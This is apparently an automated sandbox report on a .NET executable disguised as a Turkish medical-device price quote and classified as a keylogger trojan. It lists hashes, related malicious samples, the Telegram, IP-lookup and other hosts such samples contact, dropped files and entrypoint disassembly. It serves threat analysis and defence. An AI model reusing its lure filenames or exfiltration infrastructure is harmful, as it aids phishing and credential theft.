                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Siparii jpeg docx _ .exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@10/6@4/4
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 99%
                                                                            • Number of executed functions: 95
                                                                            • Number of non-executed functions: 11
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            03:57:52API Interceptor6968127x Sleep call for process: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe modified
                                                                            03:57:54API Interceptor9x Sleep call for process: powershell.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            149.154.167.220Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                  file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                    ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                193.122.6.168PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                NIsNyN2CTq.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                rOJS25YL2e.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                fiyati_teklif 65W20_ B#U00fcy#U00fck BID mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                3GloGaDtsG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                Fonts.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/
                                                                                                drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • checkip.dyndns.org/

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                checkip.dyndns.comhesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 193.122.130.0
                                                                                                16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 132.226.8.169
                                                                                                PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                pe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 132.226.247.73
                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                • 158.101.44.242
                                                                                                Halkbank_Ekstre_2024123_081142_787116.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 132.226.247.73
                                                                                                ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 132.226.247.73
                                                                                                SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 132.226.247.73
                                                                                                api.telegram.orgFiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 149.154.167.220
                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                • 149.154.167.220
                                                                                                file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                • 149.154.167.220
                                                                                                ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                reallyfreegeoip.orghesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.67.152
                                                                                                Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.67.152
                                                                                                Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.67.152
                                                                                                16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 172.67.177.134
                                                                                                PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 188.114.97.6
                                                                                                pe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.67.152
                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                • 104.21.67.152
                                                                                                Halkbank_Ekstre_2024123_081142_787116.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.67.152
                                                                                                ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.67.152

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                ORACLE-BMC-31898UShesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 193.122.130.0
                                                                                                PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 193.122.6.168
                                                                                                main_arm.elfGet hashmaliciousMiraiBrowse
                                                                                                • 140.238.98.24
                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                • 158.101.44.242
                                                                                                764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 158.101.44.242
                                                                                                lQyRqxe4dt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 193.122.130.0
                                                                                                G14yjXDQWf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 193.122.130.0
                                                                                                zy1Hkc59UZ.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                • 193.122.130.0
                                                                                                TELEGRAMRUFiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                Yn13dTQdcW.exeGet hashmaliciousVidarBrowse
                                                                                                • 149.154.167.99
                                                                                                PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 149.154.167.220
                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                • 149.154.167.220
                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                • 149.154.167.99
                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                • 149.154.167.99
                                                                                                file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                • 149.154.167.220
                                                                                                ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                NIOBEBILISIMHIZMETLERITRhesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 77.245.159.27
                                                                                                https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                • 77.245.159.9
                                                                                                PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 77.245.148.65
                                                                                                Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 77.245.159.9
                                                                                                Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 77.245.159.9
                                                                                                https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.phpGet hashmaliciousUnknownBrowse
                                                                                                • 77.245.159.21
                                                                                                SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 77.245.159.7
                                                                                                file.exeGet hashmaliciousSystemBCBrowse
                                                                                                • 77.245.149.25
                                                                                                #U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 77.245.148.100
                                                                                                SKM_C3350i2402291223.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 77.245.148.65
                                                                                                CLOUDFLARENETUShttp://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                                                                • 104.21.43.239
                                                                                                hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.67.152
                                                                                                Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.67.152
                                                                                                Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.67.152
                                                                                                NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                                • 172.67.187.200
                                                                                                16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 172.67.177.134
                                                                                                https://skillbridge.ca/onlinePaymentverify.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.95.41
                                                                                                4f9o4398o3ff34f.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.80.171
                                                                                                DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                                • 172.67.74.152
                                                                                                PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 188.114.97.6

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                54328bd36c14bd82ddaa0c04b25ed9adhesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 172.67.177.134
                                                                                                pe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                • 172.67.177.134
                                                                                                Halkbank_Ekstre_2024123_081142_787116.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 172.67.177.134
                                                                                                ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 172.67.177.134
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eFiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                                • 149.154.167.220
                                                                                                16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 149.154.167.220
                                                                                                PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 149.154.167.220
                                                                                                965600.invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                • 149.154.167.220
                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                • 149.154.167.220
                                                                                                somg.mp3.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                • 149.154.167.220
                                                                                                Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                                • 149.154.167.220
                                                                                                ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.34331486778365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                Malicious:true
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1172
                                                                                                Entropy (8bit):5.355024937536926
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:3OWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:eWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                MD5:A2B58E2A44EE011B5A5204D75F038BDD
                                                                                                SHA1:44E14B097A6F628F0B0663EAA3059B5F0E5D7D8E
                                                                                                SHA-256:397D120EAAD7512D3923B9F86ADA33D54B60CC83655021C674258AA1F2AB68F0
                                                                                                SHA-512:1B27BD34FF787264BAF374DD8F61CAB416FBEE5A8E3D32AC4CF1A8A690D186F22A865D86D55790CEA6D360F4FEF4A55E2742A9EB9CFD1F650BD6B0AC278D621F
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11mhhhjp.0vd.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uokvwa4.ssz.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tu43w3z0.nrr.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlm5rkxv.gth.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.777035580030298
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                File size:723'968 bytes
                                                                                                MD5:bd1688f2a780e8ea5437f539f5ffc596
                                                                                                SHA1:abf80f4d8ee0d4bc422b0b6d1f94b9ad72db1b7c
                                                                                                SHA256:3acb8bf44a7ddcf515e9dc3dc823d9bef720e41a02c9adfd1879ce786bb8e049
                                                                                                SHA512:8163d916d31b50b20941a0ff55ef454d0dde970bde170c513b2ed48157c9c9c6ce99f993d376f95701d76133f48ef6b81ef7ca3740acb19ffe4c59341ca29eb4
                                                                                                SSDEEP:12288:fPGHrhJDqVaQlPhI7UR0G+Iy8f/tcu73zuoW2fL6j3jsN3wL/CRr:uhMVaQlpIA2Z8f/t9MIaL/cr
                                                                                                TLSH:8AF401A86905D903C94593741AB1F1B91BBC4EDEA901E3038FED7DEFBC76D1A4C881A1
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rg..............0.............>.... ... ....@.. .......................`............@................................

                                                                                                File Icon

                                                                                                Icon Hash:0f0d210d0e070301

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x4b0e3e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6752A0AE [Fri Dec 6 06:58:54 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                push ebx
                                                                                                add byte ptr [ecx+00h], bh
                                                                                                jnc 00007F02A84F5112h
                                                                                                je 00007F02A84F5112h
                                                                                                add byte ptr [ebp+00h], ch
                                                                                                add byte ptr [ecx+00h], al
                                                                                                arpl word ptr [eax], ax
                                                                                                je 00007F02A84F5112h
                                                                                                imul eax, dword ptr [eax], 00610076h
                                                                                                je 00007F02A84F5112h
                                                                                                outsd
                                                                                                add byte ptr [edx+00h], dh
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
